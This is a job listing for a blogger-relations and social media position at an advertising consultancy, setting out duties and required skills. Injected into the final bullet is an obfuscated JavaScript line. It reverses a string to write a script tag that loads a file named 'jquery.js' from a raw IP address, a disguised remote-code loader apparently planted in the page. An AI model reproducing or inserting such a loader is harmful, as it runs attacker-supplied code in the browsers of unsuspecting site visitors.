Industry : Advertising
• Blogger relations and outreach
• Drafts documents such as conversational content for online publishing, letters and guides for the blogger and clients
• Researches online
• Monitors services including Radian 6, Buzzlogic, Cymfony (or any other research platform we bring in-house)
• Implements or co-ordinate events such as blogger engagements, third party advocacy, etc.
• Acts as a liaison between consultancy/client with external suppliers (graphic designers, photographers, EOs, etc.)
• Balances work load and tasks, communicating effectively with team members to reliably implement assignments on deadline.
• Must have basic skills and understanding in social media writing, new media, organisation and research production skills
• Demonstrates competence at using internal and external research capabilities and in preparing in-depth analyses.
• Has sound working knowledge of graphics, production and printing, video and broadcast, IT and emerging media.
• Areas of expertise which include Web 2.0 development, social networks, microcasting (video sharing and broadband channels), social computing, and search visibility including multimedia.
• Minimum of a year of experience developing digital solutions for clients.
• Fresh graduates with the required background are encouraged
• Team player
• Good communication and interpersonal skills
• Displays work ethics and values of the organisation in day-to-day behaviour
• Works with supervisor to identify and address training, education and skill-building needs.
• Naturally inquisitive towards the client’s business and interested in how social/new media can improve the business document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))